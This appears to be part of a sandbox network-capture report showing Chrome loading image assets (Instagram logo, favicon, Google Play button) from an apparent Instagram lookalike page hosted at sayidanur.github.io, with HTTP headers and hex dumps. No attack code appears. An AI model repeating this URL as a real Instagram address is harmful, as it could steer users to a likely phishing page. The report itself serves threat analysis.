                                                                                                                                                                                                                                  2024-09-29 04:53:03 UTC1369INData Raw: ed 5f be f4 d0 84 a7 66 5e f4 f8 e6 06 c0 3d fb 97 61 6f ff f2 77 d9 ca 5e fa 2c 73 fa 60 0f 36 36 8f f3 27 57 cb 83 a7 e0 3f e0 92 86 26 4f d2 69 36 ad 4a 3e 82 19 6d 0a a3 d5 12 be e7 ef fe ee ef 1e db ff 3a ac bf f0 85 2f fc eb df fb 87 17 bc e0 05 8f 3d bd f7 7b db 77 3e f9 e4 93 ff f0 ad 3f fc c3 3f fc 7d 28 94 d0 97 b7 0e 7e 03 fe 09 7e 8f dc 47 c8 28 9f 97 e5 2c 7a c5 9b 29 d0 4f 14 2f 31 2b 96 16 c0 8b c2 05 f8 56 f3 d9 3c 9f 8b d2 38 cd c6 fa 92 00 be da f7 7d d3 ec 74 d7 ce 1e 3b d6 b2 91 da 8c 99 b5 b4 3b 40 4c 06 5d 44 d3 b6 19 a2 a1 95 61 78 9e e3 72 a4 a6 ef 3b 26 c5 c8 b3 4c 21 00 40 0a 4f 6a 37 08 e3 c8 b2 5d 89 cc b6 2c 0b 0c c3 94 ec 69 ed 6e 77 b4 b6 b6 d6 1f 38 51 bb 73 7a 98 77 9b a6 99 77 ba 61 a2 35 a0 0f c0 a5 12 8c c5 8d 46 ec 1b
                                                                                                                                                                                                                                  Data Ascii: _f^=aow^,s`66'W?&Oi6J>m:/={w>??}(~~G(,z)O/1+V<8}t;;@L]Daxr;&L!@Oj7],inw8Qszwwa5F


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  11192.168.2.649729185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:04 UTC380OUTGET /instagram.com/img//instagram-logo.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:04 UTC719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 3841
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-f01"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:04 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: DB0A:1E472F:29DF8FE:2E5B002:66F8DD30
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:04 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-nyc-kteb1890078-NYC
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585585.909081,VS0,VE25
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: f3af3b2294d2349aa2ec629771cb5cbabd9435d4
                                                                                                                                                                                                                                  2024-09-29 04:53:04 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ce 00 00 00 3a 08 03 00 00 00 cf c2 96 f9 00 00 02 fd 50 4c 54 45 00 00 00 23 1f 20 23 1f 20 ff ff ff 23 20 20 24 1f 24 23 1f 20 27 21 21 40 20 40 23 20 20 24 24 24 24 20 21 23 1f 20 28 22 22 23 1f 20 2b 2b 2b 24 24 24 25 21 21 55 55 55 23 20 21 80 80 80 27 21 21 24 1f 21 24 20 21 25 1f 25 24 1f 20 2e 2e 2e 23 20 23 23 20 21 2e 23 23 23 20 21 29 23 23 40 40 40 28 22 22 23 20 22 25 20 25 26 21 21 24 20 21 23 20 23 24 21 21 29 29 29 24 20 20 23 20 21 25 1f 21 33 33 33 25 22 22 24 20 24 23 20 21 24 1f 21 24 20 21 24 20 21 24 20 20 26 22 22 39 39 39 26 26 26 25 20 22 23 1f 20 27 27 27 26 21 21 28 28 28 23 1f 21 24 20 21 24 24 24 25 1f 22 23 20 22 24 20 20 24 1f 21 23 23 23 23 20 21 24 20 20 24 1f 21 25
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR:PLTE# # # $$# '!!@ @# $$$$ !# (""# +++$$$%!!UUU# !'!!$!$ !%%$ ...# ## !.### !)##@@@(""# "% %&!!$ !# #$!!)))$ # !%!333%""$ $# !$!$ !$ !$ &""999&&&% "# '''&!!(((#!$ !$$$%"# "$ $!#### !$ $!%
                                                                                                                                                                                                                                  2024-09-29 04:53:04 UTC1378INData Raw: dd 3b 7d dd fa 36 d3 06 53 bc b3 72 c4 8d 1d 7b e6 27 c3 12 0a e0 82 02 2d a1 8c 8e dd c6 7c 83 0b c9 3e 82 f2 bb 85 24 75 4a 8f 9a 74 1a f6 ba 2e 0d b6 c2 cd b5 9f 2d 80 47 74 ed 18 16 5f 02 d7 76 8a 95 30 fe 54 7f 80 2f d8 f8 64 36 92 d2 26 c2 23 30 e2 8b 18 8e db 9f 0c 1c 8b 0e 78 a7 b3 15 fe 57 ec e6 f7 23 fd 03 ba 65 01 eb a6 27 c0 f6 e9 e3 ad 92 21 56 75 7a f2 23 58 5e be ed d9 34 18 6b 49 06 21 ae 36 e9 7c 4b f2 86 0c 88 c3 11 24 83 cd b3 e1 58 14 43 92 e1 c7 e0 78 9b 22 13 ae 5d c3 a9 2e 0b bd 48 f6 bf cb 5d 8f 8c cb a8 82 2d 76 f9 19 f1 e3 2a 00 98 75 e1 96 62 7a 3d aa ae c9 cf 93 51 8b 5b 43 f5 26 d9 2e 09 a8 96 22 7f fb 68 00 48 8b 24 b9 e6 35 38 64 70 45 10 cd 4d 65 1b ec 96 ec b1 7e aa 5f 9c 41 75 88 a2 32 cd d0 17 14 3b e0 88 8f a2 ed 89 66
                                                                                                                                                                                                                                  Data Ascii: ;}6Sr{'-|>$uJt.-Gt_v0T/d6&#0xW#e'!Vuz#X^4kI!6|K$XCx"].H]-v*ubz=Q[C&."hH$58dpEMe~_Au2;f
                                                                                                                                                                                                                                  2024-09-29 04:53:04 UTC1085INData Raw: 21 f7 51 3d 67 cf d9 67 10 13 d7 c3 a8 41 a1 c3 ed 4f b3 22 18 4b 31 0d c0 87 e4 9b f0 d6 da 3c 64 b2 49 6d 8a a1 9e 29 d9 e8 6d 78 b8 cf bc 6b 46 c1 33 ae ba 81 03 7a af 79 ce ce 7c 09 3b 9a 71 00 87 28 ea 9b cf ad f6 7a 3e 4d 95 05 24 9b d3 ba 66 67 99 74 b2 dc 02 cb 26 50 23 28 5a 00 ad 63 b8 a7 01 6c 8d b4 13 f9 24 82 3d 7a 98 d4 0b a2 28 22 63 01 33 85 9f 9a 7d 7f 9d f7 cb 5c dd 1e 9e 2f db 13 cc d6 18 4f b1 0b aa be a7 c9 39 e5 d9 33 9f 51 24 02 c8 90 e0 9c de bf be 62 18 2f 50 fc ec 5e e1 3c 05 73 4a f9 0c 12 6e 71 a6 d7 ed 13 13 fb 73 6d 28 97 e2 0d ab 9a 2c a7 78 19 62 96 bb bf 81 7c 8a 07 bd 4f 8a 2b a3 b8 ad 00 b6 a4 08 b7 bd ab 45 f7 46 c5 91 66 e6 a5 96 11 41 d3 2f fc 40 d1 ce b9 24 7b 27 e9 21 df 03 63 8c 16 97 24 b3 3a 03 a1 be a4 78 37 f6
                                                                                                                                                                                                                                  Data Ascii: !Q=ggAO"K1<dIm)mxkF3zy|;q(z>M$fgt&P#(Zcl$=z("c3}\/O93Q$b/P^<sJnqsm(,xb|O+EFfA/@${'!c$:x7


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  12192.168.2.649731185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC628OUTGET /instagram.com/img/insta-fav.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC735INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 5430
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-1536"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:05 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: 8FB6:115104:2A367B0:2EB1A97:66F8DD23
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:05 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  X-Served-By: cache-nyc-kteb1890024-NYC
                                                                                                                                                                                                                                  X-Cache: MISS
                                                                                                                                                                                                                                  X-Cache-Hits: 0
                                                                                                                                                                                                                                  X-Timer: S1727585585.088395,VS0,VE27
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: ff63a0c50b8b5143a4e27be992c23fd8de544feb
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                                                                                                                                                                                                                                  Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                                                                                                                                                                                                                                  Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                                                                                                                                                                                                                                  Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                                                                                                                                                                                                                                  2024-09-29 04:53:05 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                                                                                                                                                                                                                                  Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  13192.168.2.649734185.199.108.1534431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC382OUTGET /instagram.com/img/googleplay-button.png HTTP/1.1
                                                                                                                                                                                                                                  Host: sayidanur.github.io
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC718INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10071
                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                  permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                  Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                  ETag: "669df693-2757"
                                                                                                                                                                                                                                  expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                  Cache-Control: max-age=600
                                                                                                                                                                                                                                  x-proxy-cache: MISS
                                                                                                                                                                                                                                  X-GitHub-Request-Id: B5A6:56A91:1FA78B1:23A3592:66F8DD2E
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:06 GMT
                                                                                                                                                                                                                                  Via: 1.1 varnish
                                                                                                                                                                                                                                  Age: 3
                                                                                                                                                                                                                                  X-Served-By: cache-ewr-kewr1740032-EWR
                                                                                                                                                                                                                                  X-Cache: HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 1
                                                                                                                                                                                                                                  X-Timer: S1727585586.310817,VS0,VE1
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Fastly-Request-ID: e8816997bc5c4949b5874578865c500333d9276f
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 34 00 00 00 a8 08 06 00 00 00 f7 b0 74 12 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e0 04 14 14 11 16 4c 49 4a c7 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 26 21 49 44 41 54 78 da ed 9d 0b 94 14 d5 99 c7 3b 71 54 04 24 83 82 12 45 19 04 71 78 c9 88 23 22 28 a2 88 02 22 21 e2 9a 75 25 c8 9a 95 43 30 0a 1b 44 d1 04 c4 cd 72 c0 28 ca 6b a3 49 60 f5 b8 89 21 bb 47 31 d1 18 4d 7c e0 fb 89 82 8a 3c e5 25 22 20 f2 1a 95 18 62 be ad 7f 33 35 29 8a ea aa 7b ab 6e 55
                                                                                                                                                                                                                                  Data Ascii: PNGIHDR4tgAMAa cHRMz&u0`:pQ<pHYs.#.#x?vtIMELIJbKGD&!IDATx;qT$Eqx#"("!u%C0Dr(kI`!G1M|<%" b35){nU
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: a6 f2 55 fc 84 a6 58 c7 54 48 66 ea ea ea e4 a1 87 1e f2 14 14 e4 ad dc 72 cb 2d 79 b9 81 8c b8 a3 2d 7e 52 53 48 4a 11 19 d2 8d f0 50 68 08 a1 d0 84 8f ce 7c 7f 8a 34 7a 49 24 f7 82 ec 97 9a b7 16 78 ca 4c b3 d5 37 c8 91 ab 27 c8 91 6b 26 48 8b b5 37 4b af 4d 77 4b 8f 27 6e 92 23 da 1d cb 8b 20 63 3c fa e8 a3 07 45 5b 54 87 1f 00 3a 46 74 66 90 19 ec 2b ac 10 98 c2 1d 29 89 9a 93 62 e2 f8 e3 3c 26 c8 d1 67 9f 7d d6 b0 6f fc 7d fd fa f5 4a c9 b6 f6 30 23 f2 81 dc 32 5b 68 08 c9 d9 06 c8 9f 72 6e 10 37 0a 0d 21 14 9a 44 a8 fa d9 9f 24 f7 62 bd d0 d4 4b 4d e3 b7 17 14 94 99 a6 1f 58 ac 9d 20 4d d6 4d 90 e3 36 4e 96 be 5b e6 48 f5 ac ef 32 bf 26 23 20 fa e2 cc b9 40 67 88 a8 4b 98 99 2f 41 32 43 a1 31 7f 4c 5e e7 0f 82 a3 7b fe ae bd f6 da 83 a4 a6 d0 f9 74
                                                                                                                                                                                                                                  Data Ascii: UXTHfr-y-~RSHJPh|4zI$xL7'k&H7KMwK'n# c<E[T:Ftf+)b<&g}o}J0#2[hrn7!D$bKMX MM6N[H2&# @gK/A2C1L^{t
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: f2 6b ba fc 61 2c f3 6b 12 18 7a 72 3e 39 db 9d 15 a2 2c 48 ee 74 77 6e 18 4a 40 02 29 3a 42 67 65 58 5b 66 ae bd f6 5a a5 ce 50 75 e9 03 9d e5 0f ca 4d 68 70 6e bc 84 01 c7 87 22 79 38 7f 5e 11 b5 7b ee b9 27 ff 3b 4e 19 c2 86 73 ea 27 43 61 da c0 1d 49 a2 d0 10 42 a1 89 ce 5b 12 8b d4 e4 2c a9 31 29 33 4e 5a ec be 4d 7a d6 cd 65 7e 4d 8c a0 53 44 02 a7 3b 52 63 77 5a e8 8c 9c b5 66 f0 ff ee 8e 10 1b ea d4 14 92 99 28 85 f5 b0 41 0a 28 34 fe 52 e3 75 4e 20 9c ce f3 87 da 40 ee 29 d5 f6 86 61 c3 a0 c8 4e d8 36 70 d7 a6 a1 d0 10 42 a1 89 c6 db 12 9f d4 ac 8b 4f 6a 40 be 7e cd 96 bb 99 5f 13 23 78 6a df b3 67 4f 28 e1 40 e7 16 54 0b 85 42 13 8f d0 d8 52 83 e1 27 dd 6a ce 76 b2 2e 84 48 65 98 2a 6c 1b e0 f8 dc c7 46 a1 21 84 42 13 4d 68 4a 58 6a 90 38 8c fc
                                                                                                                                                                                                                                  Data Ascii: ka,kzr>9,HtwnJ@):BgeX[fZPuMhpn"y8^{';Ns'CaIB[,1)3NZMze~MSD;RcwZf(A(4RuN @)aN6pBOj@~_#xjgO(@TBR'jv.He*lF!BMhJXj8
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 1f a9 41 12 6e 18 d9 b0 a7 5c eb 44 50 20 4e 10 1f d5 f7 cb ea d4 5c 42 a1 49 ab d0 60 f3 cb a9 a1 d0 50 68 8a 2f 34 19 96 9a bc cc 3c 5b 2f 33 69 12 9a d5 39 a9 5b 51 93 ea 9c 9a 30 c3 4c c8 6d 89 3a 13 09 ef 8b c8 8d 9f d8 50 66 28 34 14 9a e8 c2 80 ef 1a 1e 3c f0 bd d5 19 ea a5 d0 50 68 d2 f9 01 56 4b 66 a5 26 2f 33 cf 58 32 f3 54 2e 95 42 23 6b 2b 65 ec f7 d2 3b f4 a4 93 00 ac 3b 1b 22 4a 12 32 65 86 50 68 cc 0b 03 1e 44 54 1f 60 0a 7d 07 29 34 14 9a e2 0b 4d 06 a5 a6 41 66 fe 9c 4b af d0 ac c9 c9 4f 6f 49 e7 b0 13 a6 46 eb 44 65 e2 3c 16 dc 3c 29 33 84 42 93 8c 30 a8 44 6b 50 a7 86 42 43 a1 49 af d0 64 48 6a ee bf ee a7 b2 73 78 6f 91 47 2b 52 2f 34 93 ae 4b df 90 13 9e d4 4c 4f e7 34 91 98 4c 99 21 14 9a 64 84 41 25 52 e3 15 91 a5 d0 50 68 8a cb 1a
                                                                                                                                                                                                                                  Data Ascii: An\DP N\BI`Ph/4<[/3i9[Q0Lm:Pf(4<PhVKf&/3X2T.B#k+e;;"J2ePhDT`})4MAfKOoIFDe<<)3B0DkPBCIdHjsxoG+R/4KLO4L!dA%RPh
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: d4 3d 97 93 15 0f e5 64 e2 bf 96 66 9e 0c 85 26 5c 67 66 4f 09 b5 c1 53 97 6e de 85 8a 38 e8 de d8 ed d9 1c ce 63 c3 ff eb 7e 3e d5 44 4d dd bc 05 f7 b1 a9 14 6e 4c 42 68 74 8e c3 9e 25 06 99 c3 7b 22 82 81 ff 57 6d 63 d3 89 c2 2a f2 ac 13 c5 0c 73 2d fb e5 d3 85 b9 d6 74 44 ca 9e 32 0f 70 4e ec 6b 5e e7 7b e3 ce fd c1 3d 21 e8 f5 61 72 08 55 1e 00 d2 b8 c0 6f e9 0b 4d 0a a5 e6 17 63 67 c8 17 96 cc 80 a2 48 cd 33 15 0d 42 b3 f7 85 9c 6c 7e 3c 27 73 6f 2c dd 3c 99 72 14 1a af 9b 85 ea 90 89 d7 d4 62 af 4e 5e 75 5a a9 ca 92 11 aa fb 42 67 1a 74 23 44 c7 ab da 51 61 7f 41 c3 23 aa fb c2 67 f0 13 24 7b d6 56 b1 84 46 35 3f 04 e7 2b a8 8d f1 73 95 8e d4 64 3e 4d b1 b7 a0 21 d4 30 42 03 d9 57 19 f6 09 6a 47 d5 f3 e1 15 15 09 92 2a ec d7 74 32 70 5a 0b 95 66 43
                                                                                                                                                                                                                                  Data Ascii: =df&\gfOSn8c~>DMnLBht%{"Wmc*s-tD2pNk^{=!arUoMcgH3Bl~<'so,<rbN^uZBgt#DQaA#g${VF5?+sd>M!0BWjG*t2pZfC
                                                                                                                                                                                                                                  2024-09-29 04:53:06 UTC1378INData Raw: 35 1b 6b ce 97 67 3b f6 94 7f 6b 79 02 65 c5 e0 d4 5e d3 09 b4 71 15 8a 73 de 6c 38 e4 14 cf 90 93 c9 1b 74 b1 87 9c 8a 95 e4 4b a1 d1 5b f2 03 6d 5f e8 33 e2 df f1 73 d5 29 f5 51 27 1d 38 ef 83 ba 09 f7 14 9a a4 84 26 26 a9 f9 2f 4b 66 76 d4 cb 4c 9c 52 f3 f1 69 fd e4 8d ce bd e5 47 c7 b7 97 6f 1c 72 28 45 25 a6 1a 31 c5 fa 72 86 ad a7 c2 a4 60 fd a4 e0 20 71 34 19 ad f3 6b b3 34 08 0d 8e 2f 0d c3 ad 59 13 1a 95 48 08 be ef ba 0f 51 78 9f a0 28 6e d4 72 02 ce 3c bd a0 e8 76 9a f2 0f cb 4f 68 0c 4b 4d 5e 66 4e bd c4 62 70 6c 52 f3 c9 69 17 ca d2 2e 7d 64 4e 9b ce cc 93 49 20 4a 53 ac 85 d5 54 a6 d0 7a e5 33 98 2a aa 56 8c 69 db a6 64 4b f7 29 52 45 b6 4c 5d 03 7e 6d 96 c4 b4 ed 42 1d 16 44 28 4d 25 ea b3 26 34 2a a2 19 f6 33 85 9d b6 ad f3 5d b6 8f 2d e8
                                                                                                                                                                                                                                  Data Ascii: 5kg;kye^qsl8tK[m_3s)Q'8&&/KfvLRiGor(E%1r` q4k4/YHQx(nr<vOhKM^fNbplRi.}dNI JSTz3*VidK)REL]~mBD(M%&4*3]-
